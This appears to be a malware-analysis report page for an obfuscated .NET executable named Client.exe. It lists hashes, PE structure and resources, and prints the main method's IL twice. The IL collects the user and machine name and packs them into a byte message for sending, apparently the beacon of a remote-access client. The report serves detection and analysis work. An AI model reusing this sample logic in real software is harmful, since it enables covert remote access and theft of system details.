Suspicious
Suspect

075cff28c5676199ab5007401049e613

PE Executable
|
MD5: 075cff28c5676199ab5007401049e613
|
Size: 507.39 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
075cff28c5676199ab5007401049e613
Sha1
0b6c958ba7d5bb27eff87ce20b1498b2cc7fded8
Sha256
89c0ba46177b8a0f92360767472cc7867b8a00a060caac72bb5d80cd28d03346
Sha384
c0bf661b83a0711fe18334118366a769ebe5f4c426d7a733e25dd52c7b21c27136fe872e5fa4592d71f0eea9fcf34997
Sha512
b8f5737813f2de0bbc6f9072e986b232b1fcdb03065c9a274a1d5ff4c0ecc075852169ea7866ab11767dc84d50c02468ab829f9f3189cd1e21bbe08785a3f3c7
SSDeep
12288:JBxznrnMEvK15UFo8SkIOPipFPgA8z2PFck:RMWWGFIkzPsk
TLSH
D3B408257F998E10D584287ECA7E3A09CB12E0F225027343374AF6A25D459DEDE2D3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
075cff28c5676199ab5007401049e613
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
xr1sr7qlzam62x
kv5wb0nvwaultc2kge39ffzqbd0e
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::FDZGvLBAGVeLRR(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

573
Main Method

System.Void UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::FDZGvLBAGVeLRR(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::rgElIbRkXVNSciKPaRTJBYt() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::kWhsoqQluN() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::uVWWqpbyPDOnTmwI() stloc V_3 nop <null> ldloc V_3 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::FyrTmBAltYwgFcXONQuD() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::AWZyRiRAtxetBKtOOkrb() br IL_000E: nop call System.Void UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::AWZyRiRAtxetBKtOOkrb() call System.Void CUxoMbvVgcXMoGKxVoaK.vnbNcMlqMWYAZgrFEdFeFZy::SSMAUbgpSd() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::CMYsrFjdKefl call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::oBQSvVDeMRXWOSGPvZl() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::arbAboicUdnGhooKkoQQc call System.Void cZVjefEwnZsnjJOHvXH.xCLWyHXCIbK::ZbTMNShaOylW() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::arbAboicUdnGhooKkoQQc call System.Boolean wtSRwNLztBh.jTuSSeSkbAcFvndHtMa::VQanbghlGC(System.String) brtrue IL_0080: call System.Void VyHSXcRzLM.HHfQdTwyzmTeak::EkSigycMPRhklrVQPWF() leave IL_0283: ret call System.Void VyHSXcRzLM.HHfQdTwyzmTeak::EkSigycMPRhklrVQPWF() call System.Void cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::fHmOFAMiuXXriubneGl() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldfld System.Boolean CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::tfxYnujCeJrFmtVOsHFPN brtrue IL_026E: call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::CFyiiCXKwOUgdrCQpS call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::dTZadzVjNGshhfvVBHUVkwQf() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::KbqYGWCFnceStJB() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::CfSEyXxbsLIZhJhCuIS() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::hZGJvoVTijWzZsydSXqspqOqO ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::fKHkpctDRDIySqiQy() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::SmdOguNcXevbXkqdAr() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::iOWetKoDKGrbQETqf() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::QeMWNEPIpgXHpqqsPMvIkErr() ldelem System.String call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::VgDeXEuLjj() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::LMASOlVIfDRBkY() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::GuXJMmVTrYMdSbdvGGdgDL() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::kypNenEEiFoJ() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldloc V_1 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::tziiLzEfSGhxAoZXaqs() ldelem System.String ldloc V_2 ldsfld System.Random cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::hZGJvoVTijWzZsydSXqspqOqO ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::bCUOveIAYUxYqhrVRTfYrWUOZ(System.String,System.String) ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldfld System.Boolean CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::tfxYnujCeJrFmtVOsHFPN brfalse IL_026E: call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse newobj System.Void ZGKdGVjBKjXL.ikvjuArYzCVioRacGypC::.ctor(CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL) stfld ZGKdGVjBKjXL.ikvjuArYzCVioRacGypC CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::gfIYnrhIiDadhybmaKjU ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse newobj System.Void cZVjefEwnZsnjJOHvXH.CegegShSsNSDiL::.ctor(CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL) stfld cZVjefEwnZsnjJOHvXH.CegegShSsNSDiL CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::TLqIxCtNMPrZNzS ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::uCHCgCHKuHrl() newarr System.Object dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::QdKdEJTmstXkddHhiCqKCjrr() call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::zmNzndpjmAbAfjLUhlco() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::BJsukLOwDjKOtWgYXBI() call System.Byte[] cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::rTUkrdfonFQOSYHpsOqsxaNG() stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::RCZzdMEBashlTxCzbsIiI() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::lUVQJYyOGuT stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::atwSofJlfiiHOyksQYGMVK() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::hRyLoWoWPvIBphvDHZ stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::ZuwThxesab() call System.String System.Environment::get_UserName() call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::AsvRXRtvfMCIjf() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::cfCKXYroNyCMjEPibkb() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::kFOuAXqJXQ stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::TPrXXsMcoApIgkWFpGBiUgxD() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::KRfdmgcRRTSVPZPJpQYpEV stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::iNPRPDIyfJMnfmeM() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::EvypZrEfnhcECfqw stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::AMIugyhJsVitbm() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::oGrQEEIIItLTtowMAZjBY stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::nBofwKYxhJAaKRK() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::wlgiSjyVlNAszbloxainqDZMo stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::WVFflvcCOiIWhZF() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::STEyLKGpvGp stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::XuzdxzQEbPb() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::LQAIWrxPnTPuCNOYaSsQmTl stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::fXXrhCMXVGhsZmQNCBQHE() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::QLszPQxRKLMJhJcUrGA stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::DPShVWFAEVTrXrKQpeNhiQNGE() call System.String cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::fDBuaXSzRrAZXwfpOfZY() stelem.ref <null> call System.Byte[] ZNRPfvuZnQCEteylUNIvZ.PxSHxfkHRdTMmZayyPpNaY::MKbifLnZcMrNFw(System.Object[]) callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::ZyKtPKSmkXRLYCStPkjFuVZk(System.Byte[]) call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse pop <null> leave IL_0283: ret ret <null>
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::FDZGvLBAGVeLRR(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

573
Main Method

System.Void UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::FDZGvLBAGVeLRR(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::rgElIbRkXVNSciKPaRTJBYt() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::kWhsoqQluN() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::uVWWqpbyPDOnTmwI() stloc V_3 nop <null> ldloc V_3 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::FyrTmBAltYwgFcXONQuD() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::AWZyRiRAtxetBKtOOkrb() br IL_000E: nop call System.Void UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::AWZyRiRAtxetBKtOOkrb() call System.Void CUxoMbvVgcXMoGKxVoaK.vnbNcMlqMWYAZgrFEdFeFZy::SSMAUbgpSd() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::CMYsrFjdKefl call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::oBQSvVDeMRXWOSGPvZl() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::arbAboicUdnGhooKkoQQc call System.Void cZVjefEwnZsnjJOHvXH.xCLWyHXCIbK::ZbTMNShaOylW() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::arbAboicUdnGhooKkoQQc call System.Boolean wtSRwNLztBh.jTuSSeSkbAcFvndHtMa::VQanbghlGC(System.String) brtrue IL_0080: call System.Void VyHSXcRzLM.HHfQdTwyzmTeak::EkSigycMPRhklrVQPWF() leave IL_0283: ret call System.Void VyHSXcRzLM.HHfQdTwyzmTeak::EkSigycMPRhklrVQPWF() call System.Void cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::fHmOFAMiuXXriubneGl() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldfld System.Boolean CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::tfxYnujCeJrFmtVOsHFPN brtrue IL_026E: call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::CFyiiCXKwOUgdrCQpS call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::dTZadzVjNGshhfvVBHUVkwQf() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::KbqYGWCFnceStJB() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::CfSEyXxbsLIZhJhCuIS() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::hZGJvoVTijWzZsydSXqspqOqO ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::fKHkpctDRDIySqiQy() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::SmdOguNcXevbXkqdAr() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::iOWetKoDKGrbQETqf() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::QeMWNEPIpgXHpqqsPMvIkErr() ldelem System.String call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::VgDeXEuLjj() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::LMASOlVIfDRBkY() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::GuXJMmVTrYMdSbdvGGdgDL() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::kypNenEEiFoJ() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldloc V_1 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::tziiLzEfSGhxAoZXaqs() ldelem System.String ldloc V_2 ldsfld System.Random cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::hZGJvoVTijWzZsydSXqspqOqO ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::bCUOveIAYUxYqhrVRTfYrWUOZ(System.String,System.String) ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldfld System.Boolean CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::tfxYnujCeJrFmtVOsHFPN brfalse IL_026E: call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse newobj System.Void ZGKdGVjBKjXL.ikvjuArYzCVioRacGypC::.ctor(CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL) stfld ZGKdGVjBKjXL.ikvjuArYzCVioRacGypC CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::gfIYnrhIiDadhybmaKjU ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse newobj System.Void cZVjefEwnZsnjJOHvXH.CegegShSsNSDiL::.ctor(CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL) stfld cZVjefEwnZsnjJOHvXH.CegegShSsNSDiL CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::TLqIxCtNMPrZNzS ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::uCHCgCHKuHrl() newarr System.Object dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::QdKdEJTmstXkddHhiCqKCjrr() call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::zmNzndpjmAbAfjLUhlco() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::BJsukLOwDjKOtWgYXBI() call System.Byte[] cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::rTUkrdfonFQOSYHpsOqsxaNG() stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::RCZzdMEBashlTxCzbsIiI() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::lUVQJYyOGuT stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::atwSofJlfiiHOyksQYGMVK() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::hRyLoWoWPvIBphvDHZ stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::ZuwThxesab() call System.String System.Environment::get_UserName() call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::AsvRXRtvfMCIjf() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::cfCKXYroNyCMjEPibkb() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::kFOuAXqJXQ stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::TPrXXsMcoApIgkWFpGBiUgxD() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::KRfdmgcRRTSVPZPJpQYpEV stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::iNPRPDIyfJMnfmeM() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::EvypZrEfnhcECfqw stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::AMIugyhJsVitbm() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::oGrQEEIIItLTtowMAZjBY stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::nBofwKYxhJAaKRK() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::wlgiSjyVlNAszbloxainqDZMo stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::WVFflvcCOiIWhZF() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::STEyLKGpvGp stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::XuzdxzQEbPb() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::LQAIWrxPnTPuCNOYaSsQmTl stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::fXXrhCMXVGhsZmQNCBQHE() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::QLszPQxRKLMJhJcUrGA stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::DPShVWFAEVTrXrKQpeNhiQNGE() call System.String cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::fDBuaXSzRrAZXwfpOfZY() stelem.ref <null> call System.Byte[] ZNRPfvuZnQCEteylUNIvZ.PxSHxfkHRdTMmZayyPpNaY::MKbifLnZcMrNFw(System.Object[]) callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::ZyKtPKSmkXRLYCStPkjFuVZk(System.Byte[]) call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse pop <null> leave IL_0283: ret ret <null>
075cff28c5676199ab5007401049e613 (507.39 KB)
File Structure
075cff28c5676199ab5007401049e613
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
xr1sr7qlzam62x
kv5wb0nvwaultc2kge39ffzqbd0e
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙